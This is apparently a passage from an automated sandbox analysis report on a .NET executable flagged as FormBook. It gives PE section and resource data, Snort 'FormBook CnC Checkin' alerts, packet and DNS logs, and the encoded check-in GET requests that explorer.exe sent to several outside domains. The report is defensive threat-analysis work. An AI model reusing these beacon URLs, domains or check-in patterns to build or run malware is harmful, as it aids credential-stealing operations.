IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xce000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xa450c	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa3f90	0xa4000	False	0.8825043468940549	data	7.772448962895667	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xa6000	0x26e10	0x27000	False	0.23845653044871795	data	4.423953147799057	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xce000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xa6130	0x267a0	Device independent bitmap graphic, 195 x 390 x 32, image size 152100	0.23598984771573603
RT_GROUP_ICON	0xcc8d0	0x14	data	1.1
RT_VERSION	0xcc8e4	0x340	data	0.4362980769230769
RT_MANIFEST	0xccc24	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.1135.186.223.18049714802031412 10/24/23-08:28:29.857367	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49714	80	192.168.2.11	35.186.223.180
192.168.2.11104.19.157.2349717802031412 10/24/23-08:29:30.721718	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49717	80	192.168.2.11	104.19.157.23
192.168.2.1123.227.38.7449718802031412 10/24/23-08:29:51.038616	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49718	80	192.168.2.11	23.227.38.74
192.168.2.113.33.130.19049716802031412 10/24/23-08:29:11.748633	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49716	80	192.168.2.11	3.33.130.190
192.168.2.11104.247.82.5149723802031412 10/24/23-08:31:16.668472	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49723	80	192.168.2.11	104.247.82.51
192.168.2.11103.224.212.21249713802031412 10/24/23-08:28:09.457640	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49713	80	192.168.2.11	103.224.212.212
192.168.2.11103.224.212.21049721802031412 10/24/23-08:30:33.279150	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49721	80	192.168.2.11	103.224.212.210
192.168.2.11104.21.69.17449722802031412 10/24/23-08:30:53.443055	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49722	80	192.168.2.11	104.21.69.174

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2023 08:28:09.288037062 CEST	49713	80	192.168.2.11	103.224.212.212
Oct 24, 2023 08:28:09.453689098 CEST	80	49713	103.224.212.212	192.168.2.11
Oct 24, 2023 08:28:09.453933954 CEST	49713	80	192.168.2.11	103.224.212.212
Oct 24, 2023 08:28:09.457639933 CEST	49713	80	192.168.2.11	103.224.212.212
Oct 24, 2023 08:28:09.655143976 CEST	80	49713	103.224.212.212	192.168.2.11
Oct 24, 2023 08:28:09.655196905 CEST	80	49713	103.224.212.212	192.168.2.11
Oct 24, 2023 08:28:09.655271053 CEST	49713	80	192.168.2.11	103.224.212.212
Oct 24, 2023 08:28:09.655325890 CEST	49713	80	192.168.2.11	103.224.212.212
Oct 24, 2023 08:28:09.820971012 CEST	80	49713	103.224.212.212	192.168.2.11
Oct 24, 2023 08:28:29.746941090 CEST	49714	80	192.168.2.11	35.186.223.180
Oct 24, 2023 08:28:29.857187033 CEST	80	49714	35.186.223.180	192.168.2.11
Oct 24, 2023 08:28:29.857265949 CEST	49714	80	192.168.2.11	35.186.223.180
Oct 24, 2023 08:28:29.857367039 CEST	49714	80	192.168.2.11	35.186.223.180
Oct 24, 2023 08:28:29.965651035 CEST	80	49714	35.186.223.180	192.168.2.11
Oct 24, 2023 08:28:30.093662977 CEST	80	49714	35.186.223.180	192.168.2.11
Oct 24, 2023 08:28:30.093682051 CEST	80	49714	35.186.223.180	192.168.2.11
Oct 24, 2023 08:28:30.093797922 CEST	49714	80	192.168.2.11	35.186.223.180
Oct 24, 2023 08:28:30.093877077 CEST	49714	80	192.168.2.11	35.186.223.180
Oct 24, 2023 08:28:30.201967955 CEST	80	49714	35.186.223.180	192.168.2.11
Oct 24, 2023 08:29:10.333281994 CEST	49716	80	192.168.2.11	3.33.130.190
Oct 24, 2023 08:29:10.436137915 CEST	80	49716	3.33.130.190	192.168.2.11
Oct 24, 2023 08:29:10.436266899 CEST	49716	80	192.168.2.11	3.33.130.190
Oct 24, 2023 08:29:11.748632908 CEST	49716	80	192.168.2.11	3.33.130.190
Oct 24, 2023 08:29:11.851406097 CEST	80	49716	3.33.130.190	192.168.2.11
Oct 24, 2023 08:29:11.853933096 CEST	80	49716	3.33.130.190	192.168.2.11
Oct 24, 2023 08:29:11.853954077 CEST	80	49716	3.33.130.190	192.168.2.11
Oct 24, 2023 08:29:11.854057074 CEST	49716	80	192.168.2.11	3.33.130.190
Oct 24, 2023 08:29:11.858732939 CEST	49716	80	192.168.2.11	3.33.130.190
Oct 24, 2023 08:29:11.867748976 CEST	80	49716	3.33.130.190	192.168.2.11
Oct 24, 2023 08:29:11.867930889 CEST	49716	80	192.168.2.11	3.33.130.190
Oct 24, 2023 08:29:11.961117029 CEST	80	49716	3.33.130.190	192.168.2.11
Oct 24, 2023 08:29:30.618877888 CEST	49717	80	192.168.2.11	104.19.157.23
Oct 24, 2023 08:29:30.721451998 CEST	80	49717	104.19.157.23	192.168.2.11
Oct 24, 2023 08:29:30.721605062 CEST	49717	80	192.168.2.11	104.19.157.23
Oct 24, 2023 08:29:30.721718073 CEST	49717	80	192.168.2.11	104.19.157.23
Oct 24, 2023 08:29:30.824203968 CEST	80	49717	104.19.157.23	192.168.2.11
Oct 24, 2023 08:29:30.826714993 CEST	80	49717	104.19.157.23	192.168.2.11
Oct 24, 2023 08:29:30.826867104 CEST	49717	80	192.168.2.11	104.19.157.23
Oct 24, 2023 08:29:30.827660084 CEST	80	49717	104.19.157.23	192.168.2.11
Oct 24, 2023 08:29:30.827711105 CEST	49717	80	192.168.2.11	104.19.157.23
Oct 24, 2023 08:29:30.929198980 CEST	80	49717	104.19.157.23	192.168.2.11
Oct 24, 2023 08:29:50.935843945 CEST	49718	80	192.168.2.11	23.227.38.74
Oct 24, 2023 08:29:51.038419008 CEST	80	49718	23.227.38.74	192.168.2.11
Oct 24, 2023 08:29:51.038539886 CEST	49718	80	192.168.2.11	23.227.38.74
Oct 24, 2023 08:29:51.038615942 CEST	49718	80	192.168.2.11	23.227.38.74
Oct 24, 2023 08:29:51.140892982 CEST	80	49718	23.227.38.74	192.168.2.11
Oct 24, 2023 08:29:51.155780077 CEST	80	49718	23.227.38.74	192.168.2.11
Oct 24, 2023 08:29:51.155838966 CEST	80	49718	23.227.38.74	192.168.2.11
Oct 24, 2023 08:29:51.155880928 CEST	80	49718	23.227.38.74	192.168.2.11
Oct 24, 2023 08:29:51.155919075 CEST	80	49718	23.227.38.74	192.168.2.11
Oct 24, 2023 08:29:51.155946016 CEST	49718	80	192.168.2.11	23.227.38.74
Oct 24, 2023 08:29:51.155956984 CEST	80	49718	23.227.38.74	192.168.2.11
Oct 24, 2023 08:29:51.155987024 CEST	49718	80	192.168.2.11	23.227.38.74
Oct 24, 2023 08:29:51.156121969 CEST	80	49718	23.227.38.74	192.168.2.11
Oct 24, 2023 08:29:51.156203032 CEST	49718	80	192.168.2.11	23.227.38.74
Oct 24, 2023 08:29:51.156203032 CEST	49718	80	192.168.2.11	23.227.38.74
Oct 24, 2023 08:29:51.258464098 CEST	80	49718	23.227.38.74	192.168.2.11
Oct 24, 2023 08:30:33.113168955 CEST	49721	80	192.168.2.11	103.224.212.210
Oct 24, 2023 08:30:33.278834105 CEST	80	49721	103.224.212.210	192.168.2.11
Oct 24, 2023 08:30:33.279048920 CEST	49721	80	192.168.2.11	103.224.212.210
Oct 24, 2023 08:30:33.279150009 CEST	49721	80	192.168.2.11	103.224.212.210
Oct 24, 2023 08:30:33.469585896 CEST	80	49721	103.224.212.210	192.168.2.11
Oct 24, 2023 08:30:33.469654083 CEST	80	49721	103.224.212.210	192.168.2.11
Oct 24, 2023 08:30:33.469818115 CEST	49721	80	192.168.2.11	103.224.212.210
Oct 24, 2023 08:30:33.474467993 CEST	49721	80	192.168.2.11	103.224.212.210
Oct 24, 2023 08:30:33.640151024 CEST	80	49721	103.224.212.210	192.168.2.11
Oct 24, 2023 08:30:53.340344906 CEST	49722	80	192.168.2.11	104.21.69.174
Oct 24, 2023 08:30:53.442823887 CEST	80	49722	104.21.69.174	192.168.2.11
Oct 24, 2023 08:30:53.442944050 CEST	49722	80	192.168.2.11	104.21.69.174
Oct 24, 2023 08:30:53.443054914 CEST	49722	80	192.168.2.11	104.21.69.174
Oct 24, 2023 08:30:53.546045065 CEST	80	49722	104.21.69.174	192.168.2.11
Oct 24, 2023 08:30:53.931694031 CEST	49722	80	192.168.2.11	104.21.69.174
Oct 24, 2023 08:30:54.034116983 CEST	80	49722	104.21.69.174	192.168.2.11
Oct 24, 2023 08:30:54.034203053 CEST	49722	80	192.168.2.11	104.21.69.174
Oct 24, 2023 08:31:16.411492109 CEST	49723	80	192.168.2.11	104.247.82.51
Oct 24, 2023 08:31:16.540956020 CEST	80	49723	104.247.82.51	192.168.2.11
Oct 24, 2023 08:31:16.541119099 CEST	49723	80	192.168.2.11	104.247.82.51
Oct 24, 2023 08:31:16.668318033 CEST	80	49723	104.247.82.51	192.168.2.11
Oct 24, 2023 08:31:16.668472052 CEST	49723	80	192.168.2.11	104.247.82.51
Oct 24, 2023 08:31:16.799911976 CEST	80	49723	104.247.82.51	192.168.2.11
Oct 24, 2023 08:31:16.799953938 CEST	80	49723	104.247.82.51	192.168.2.11
Oct 24, 2023 08:31:16.799973011 CEST	80	49723	104.247.82.51	192.168.2.11
Oct 24, 2023 08:31:16.800214052 CEST	49723	80	192.168.2.11	104.247.82.51
Oct 24, 2023 08:31:16.800255060 CEST	49723	80	192.168.2.11	104.247.82.51
Oct 24, 2023 08:31:16.931246996 CEST	80	49723	104.247.82.51	192.168.2.11

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2023 08:27:49.527225971 CEST	58069	53	192.168.2.11	1.1.1.1
Oct 24, 2023 08:27:49.632117987 CEST	53	58069	1.1.1.1	192.168.2.11
Oct 24, 2023 08:28:08.979837894 CEST	63967	53	192.168.2.11	1.1.1.1
Oct 24, 2023 08:28:09.278362036 CEST	53	63967	1.1.1.1	192.168.2.11
Oct 24, 2023 08:28:29.229845047 CEST	56347	53	192.168.2.11	1.1.1.1
Oct 24, 2023 08:28:29.746062040 CEST	53	56347	1.1.1.1	192.168.2.11
Oct 24, 2023 08:29:10.109508038 CEST	62666	53	192.168.2.11	1.1.1.1
Oct 24, 2023 08:29:10.330265045 CEST	53	62666	1.1.1.1	192.168.2.11
Oct 24, 2023 08:29:30.448321104 CEST	59972	53	192.168.2.11	1.1.1.1
Oct 24, 2023 08:29:30.617741108 CEST	53	59972	1.1.1.1	192.168.2.11
Oct 24, 2023 08:29:50.823311090 CEST	61811	53	192.168.2.11	1.1.1.1
Oct 24, 2023 08:29:50.934587002 CEST	53	61811	1.1.1.1	192.168.2.11
Oct 24, 2023 08:30:11.265486956 CEST	51255	53	192.168.2.11	1.1.1.1
Oct 24, 2023 08:30:11.370093107 CEST	53	51255	1.1.1.1	192.168.2.11
Oct 24, 2023 08:30:32.870191097 CEST	57931	53	192.168.2.11	1.1.1.1
Oct 24, 2023 08:30:33.111912012 CEST	53	57931	1.1.1.1	192.168.2.11
Oct 24, 2023 08:30:53.229465008 CEST	54916	53	192.168.2.11	1.1.1.1
Oct 24, 2023 08:30:53.339016914 CEST	53	54916	1.1.1.1	192.168.2.11
Oct 24, 2023 08:31:16.296188116 CEST	60273	53	192.168.2.11	1.1.1.1
Oct 24, 2023 08:31:16.410104036 CEST	53	60273	1.1.1.1	192.168.2.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 24, 2023 08:27:49.527225971 CEST	192.168.2.11	1.1.1.1	0x9c48	Standard query (0)	www.zg9tywlubmftzw5ldzi0mdm.com	A (IP address)	IN (0x0001)	false
Oct 24, 2023 08:28:08.979837894 CEST	192.168.2.11	1.1.1.1	0x74ef	Standard query (0)	www.fhstbanknigeria.com	A (IP address)	IN (0x0001)	false
Oct 24, 2023 08:28:29.229845047 CEST	192.168.2.11	1.1.1.1	0x606a	Standard query (0)	www.m-baer.com	A (IP address)	IN (0x0001)	false
Oct 24, 2023 08:29:10.109508038 CEST	192.168.2.11	1.1.1.1	0xf3ea	Standard query (0)	www.totalkfood.com	A (IP address)	IN (0x0001)	false
Oct 24, 2023 08:29:30.448321104 CEST	192.168.2.11	1.1.1.1	0xadf2	Standard query (0)	www.cryptarrow.com	A (IP address)	IN (0x0001)	false
Oct 24, 2023 08:29:50.823311090 CEST	192.168.2.11	1.1.1.1	0xe58b	Standard query (0)	www.starryallure.com	A (IP address)	IN (0x0001)	false
Oct 24, 2023 08:30:11.265486956 CEST	192.168.2.11	1.1.1.1	0x559c	Standard query (0)	www.roundaboutlogistics.com	A (IP address)	IN (0x0001)	false
Oct 24, 2023 08:30:32.870191097 CEST	192.168.2.11	1.1.1.1	0xcdf4	Standard query (0)	www.nightoracle.com	A (IP address)	IN (0x0001)	false
Oct 24, 2023 08:30:53.229465008 CEST	192.168.2.11	1.1.1.1	0xadd8	Standard query (0)	www.mtauratarnt.com	A (IP address)	IN (0x0001)	false
Oct 24, 2023 08:31:16.296188116 CEST	192.168.2.11	1.1.1.1	0x70c7	Standard query (0)	www.robertjamesfineclothing.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 24, 2023 08:27:49.632117987 CEST	1.1.1.1	192.168.2.11	0x9c48	Name error (3)	www.zg9tywlubmftzw5ldzi0mdm.com	none	none	A (IP address)	IN (0x0001)	false
Oct 24, 2023 08:28:09.278362036 CEST	1.1.1.1	192.168.2.11	0x74ef	No error (0)	www.fhstbanknigeria.com		103.224.212.212	A (IP address)	IN (0x0001)	false
Oct 24, 2023 08:28:29.746062040 CEST	1.1.1.1	192.168.2.11	0x606a	No error (0)	www.m-baer.com		35.186.223.180	A (IP address)	IN (0x0001)	false
Oct 24, 2023 08:29:10.330265045 CEST	1.1.1.1	192.168.2.11	0xf3ea	No error (0)	www.totalkfood.com	totalkfood.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 24, 2023 08:29:10.330265045 CEST	1.1.1.1	192.168.2.11	0xf3ea	No error (0)	totalkfood.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Oct 24, 2023 08:29:10.330265045 CEST	1.1.1.1	192.168.2.11	0xf3ea	No error (0)	totalkfood.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Oct 24, 2023 08:29:30.617741108 CEST	1.1.1.1	192.168.2.11	0xadf2	No error (0)	www.cryptarrow.com	cname.beehiiv.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 24, 2023 08:29:30.617741108 CEST	1.1.1.1	192.168.2.11	0xadf2	No error (0)	cname.beehiiv.com		104.19.157.23	A (IP address)	IN (0x0001)	false
Oct 24, 2023 08:29:30.617741108 CEST	1.1.1.1	192.168.2.11	0xadf2	No error (0)	cname.beehiiv.com		104.19.156.23	A (IP address)	IN (0x0001)	false
Oct 24, 2023 08:29:50.934587002 CEST	1.1.1.1	192.168.2.11	0xe58b	No error (0)	www.starryallure.com	ac9ba1-4.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 24, 2023 08:29:50.934587002 CEST	1.1.1.1	192.168.2.11	0xe58b	No error (0)	ac9ba1-4.myshopify.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 24, 2023 08:29:50.934587002 CEST	1.1.1.1	192.168.2.11	0xe58b	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)	false
Oct 24, 2023 08:30:11.370093107 CEST	1.1.1.1	192.168.2.11	0x559c	Name error (3)	www.roundaboutlogistics.com	none	none	A (IP address)	IN (0x0001)	false
Oct 24, 2023 08:30:33.111912012 CEST	1.1.1.1	192.168.2.11	0xcdf4	No error (0)	www.nightoracle.com		103.224.212.210	A (IP address)	IN (0x0001)	false
Oct 24, 2023 08:30:53.339016914 CEST	1.1.1.1	192.168.2.11	0xadd8	No error (0)	www.mtauratarnt.com		104.21.69.174	A (IP address)	IN (0x0001)	false
Oct 24, 2023 08:30:53.339016914 CEST	1.1.1.1	192.168.2.11	0xadd8	No error (0)	www.mtauratarnt.com		172.67.210.176	A (IP address)	IN (0x0001)	false
Oct 24, 2023 08:31:16.410104036 CEST	1.1.1.1	192.168.2.11	0x70c7	No error (0)	www.robertjamesfineclothing.com		104.247.82.51	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.fhstbanknigeria.com

www.m-baer.com

www.totalkfood.com

www.cryptarrow.com

www.starryallure.com

www.nightoracle.com

www.mtauratarnt.com

www.robertjamesfineclothing.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.11	49713	103.224.212.212	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 08:28:09.457639933 CEST	76	OUT	GET /rs10/?s0=3hcrZOpg0bcnkhh15AgNBYOBAaFzA2w39b7OLOTzLX17gT7vmmZNER029cGGSq2teP1k&CB_=7nEpdJs HTTP/1.1 Host: www.fhstbanknigeria.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2023 08:28:09.655143976 CEST	103	IN	HTTP/1.1 302 Found date: Tue, 24 Oct 2023 06:28:09 GMT server: Apache set-cookie: __tad=1698128889.2787581; expires=Fri, 21-Oct-2033 06:28:09 GMT; Max-Age=315360000 location: http://ww25.fhstbanknigeria.com/rs10/?s0=3hcrZOpg0bcnkhh15AgNBYOBAaFzA2w39b7OLOTzLX17gT7vmmZNER029cGGSq2teP1k&CB_=7nEpdJs&subid1=20231024-1728-0943-acd7-e1b6aba9e653 content-length: 2 content-type: text/html; charset=UTF-8 connection: close Data Raw: 0a 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.11	49714	35.186.223.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 08:28:29.857367039 CEST	104	OUT	GET /rs10/?s0=ZZ4PisnlhGWrM+/cjm+8AJE09HfnDkVQJTexn2MBWRnXnlNv1XnPYSI4wm3ClD5tCXKT&CB_=7nEpdJs HTTP/1.1 Host: www.m-baer.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2023 08:28:30.093662977 CEST	104	IN	HTTP/1.1 403 Forbidden Content-Length: 134 Content-Type: text/html; charset=UTF-8 Date: Tue, 24 Oct 2023 06:28:30 GMT Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 34 30 33 3c 2f 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e Data Ascii: <!doctype html><meta charset="utf-8"><meta name=viewport content="width=device-width, initial-scale=1"><title>403</title>403 Forbidden

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.11	49716	3.33.130.190	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 08:29:11.748632908 CEST	115	OUT	GET /rs10/?s0=slgSrzWs1cS9Mrf67s4eYcm1uzSVXOcUNS0TfgAxqWiu35L4D0Krxoj420pmZqiiSKyn&CB_=7nEpdJs HTTP/1.1 Host: www.totalkfood.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2023 08:29:11.853933096 CEST	115	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 24 Oct 2023 06:29:11 GMT Content-Type: text/html Content-Length: 291 Connection: close ETag: "65271109-123" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.11	49717	104.19.157.23	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 08:29:30.721718073 CEST	117	OUT	GET /rs10/?s0=/ItgkxO8+brroXQDZXm3WikSbiD+2fsSKu8F0pp3MeXxfp3Mbl7kcl4ctkKIsIVoIHZ+&CB_=7nEpdJs HTTP/1.1 Host: www.cryptarrow.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2023 08:29:30.826714993 CEST	117	IN	HTTP/1.1 409 Conflict Date: Tue, 24 Oct 2023 06:29:30 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 16 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 81b02a734a8781df-IAD Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 31 Data Ascii: error code: 1001

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.11	49718	23.227.38.74	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 08:29:51.038615942 CEST	118	OUT	GET /rs10/?s0=b31BqU8cfCYi6WO0sgYPso6gRJvymF5WHiXPhCkAgId39DsuJJ4fruR04rjCCBvdCTM/&CB_=7nEpdJs HTTP/1.1 Host: www.starryallure.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2023 08:29:51.155780077 CEST	120	IN	HTTP/1.1 403 Forbidden Date: Tue, 24 Oct 2023 06:29:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4515 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: max-age=15 Expires: Tue, 24 Oct 2023 06:30:06 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0QFe%2BigM2W9xjZuxxhYuD21NF6hfLHhuYwiXnDDNNDNU9n7pvn3nhDKB7RfiTsFdJVKNDYT%2F5%2B8jgEa9mt8UfwfBlS6QwOE%2F5PgPz%2BprPHaw9wx2Qw%2FsapuixXTY3twvZjrTMszY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Server-Timing: cfRequestDuration;dur=13.999939 Server: cloudflare CF-RAY: 81b02af23c27061b-IAD alt-svc: h3=":443"; ma=86400 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="no
